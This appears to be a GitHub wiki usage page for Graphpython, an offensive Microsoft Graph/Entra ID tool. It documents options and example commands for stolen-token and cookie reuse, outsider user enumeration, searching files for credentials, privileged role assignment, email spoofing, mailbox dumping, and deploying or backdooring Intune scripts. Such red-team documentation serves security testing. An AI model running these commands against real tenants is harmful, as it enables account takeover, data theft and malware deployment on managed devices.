Skip to content

Usage

Jump to bottom
mc edited this page Jul 24, 2024 · 22 revisions

This page documents the available options for Graphpython.

usage: Graphpython [-h] [--command COMMAND] [--list-commands] [--token TOKEN] [--estsauthcookie ESTSAUTHCOOKIE] [--use-cae] [--cert CERT]
                   [--domain DOMAIN] [--tenant TENANT] [--username USERNAME] [--secret SECRET] [--id ID] [--select SELECT] [--query QUERY]
                   [--search SEARCH] [--entity {driveItem,message,chatMessage,site,event}] [--device {Mac,Windows,AndroidMobile,iPhone}]
                   [--browser {Android,IE,Chrome,Firefox,Edge,Safari}] [--only-return-cookies]
                   [--mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}] [--top TOP]
                   [--script SCRIPT] [--email EMAIL]

General

  • -h, --help

    • Show the help message and exit.
    Graphpython -h

  • --command COMMAND

    • Specify the command to execute.
    Graphpython --command list-users

  • --list-commands

    • List all available commands.
    Graphpython --list-commands

Authentication

  • --token TOKEN

    • Provide a Microsoft Graph access token or refresh token for FOCI abuse.
    Graphpython --token YOUR_ACCESS_TOKEN

  • --estsauthcookie ESTSAUTHCOOKIE

    • Use 'ESTSAuth' or 'ESTSAuthPersistent' cookie.
    Graphpython --estsauthcookie YOUR_COOKIE

  • --use-cae

    • Enable Continuous Access Evaluation (CAE). This adds 'cp1' as a client claim to obtain an access token valid for 24 hours.
    Graphpython --use-cae

  • --username USERNAME

    • Provide a username or a file containing usernames for user enumeration as an outsider.
    Graphpython --username user@example.com

  • --cert CERT

    • Path to an X509Certificate (.pfx file).
    Graphpython --cert /path/to/certificate.pfx

  • --domain DOMAIN

    • Specify the target domain.
    Graphpython --domain example.com

  • --tenant TENANT

    • Specify the target tenant ID.
    Graphpython --tenant YOUR_TENANT_ID

  • --secret SECRET

    • Enterprise application secret for accessing tokens (used with invoke-appsecrettoaccesstoken command).
    Graphpython --secret YOUR_SECRET

Target

  • --id ID

    • ID of the target object.
    Graphpython --id OBJECT_ID

  • --select SELECT

    • Specify fields to select from the output.
    Graphpython --select id,displayName

  • --query QUERY

    • Raw API query URL (GET only).
    Graphpython --query https://graph.microsoft.com/v1.0/users

  • --search SEARCH

    • Search string for querying.
    Graphpython --search "John Doe"

Entities

  • --entity {driveItem,message,chatMessage,site,event}

    • Specify the type of entity to search for:
      • driveItem: OneDrive items
      • message: Mail messages
      • chatMessage: Teams chat messages
      • site: SharePoint sites
      • event: Calendar events
    Graphpython --entity message

User-Agents

  • --device {Mac,Windows,AndroidMobile,iPhone}

    • Specify the device type for User-Agent forging.
    Graphpython --device Windows

  • --browser {Android,IE,Chrome,Firefox,Edge,Safari}

    • Specify the browser type for User-Agent forging.
    Graphpython --browser Chrome

  • --only-return-cookies

    • Only return cookies from the request (used with open-owamailboxinbrowser command).
    Graphpython --only-return-cookies

Mail

  • --mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}

    • Specify the mail folder to dump using the dump-owamailbox command.
    Graphpython --mail-folder inbox

  • --top TOP

    • Number of messages to retrieve (integer).
    Graphpython --top 50

Payloads

  • --script SCRIPT

    • File containing the script content for deploy-maliciousscript or backdoor-script.
    Graphpython --script /path/to/script.ps1

  • --email EMAIL

    • File containing OWA email message body content for spoof-owaemailmessage.
    Graphpython --email /path/to/email.txt

Examples

Graphpython --command invoke-reconasoutsider --domain company.com
Graphpython --command invoke-userenumerationasoutsider --username <email@company.com/emails.txt>
Graphpython --command get-graphtokens --use-cae
Graphpython --command invoke-refreshtoazuremanagementtoken --tenant <tenant-id> --token refresh-token --use-cae
Graphpython --command get-users --token eyJ0... -- select displayname,id [--id <userid>]
Graphpython --command list-recentonedrivefiles --token token
Graphpython --command invoke-search --search "credentials" --entity driveItem --token token
Graphpython --command invoke-customquery --query https://graph.microsoft.com/v1.0/sites/{siteId}/drives --token token
Graphpython --command assign-privilegedrole --token token
Graphpython --command spoof-owaemailmessage [--id <userid to spoof>] --token token --email email-body.txt
Graphpython --command get-manageddevices --token intune-token
Graphpython --command deploy-maliciousscript --script malicious.ps1 --token token
Graphpython --command backdoor-script --id <scriptid> --script backdoored-script.ps1 --token token
Graphpython --command add-exclusiongrouptopolicy --id <policyid> --token token
Graphpython --command reboot-device --id <deviceid> --token eyj0...
Clone this wiki locally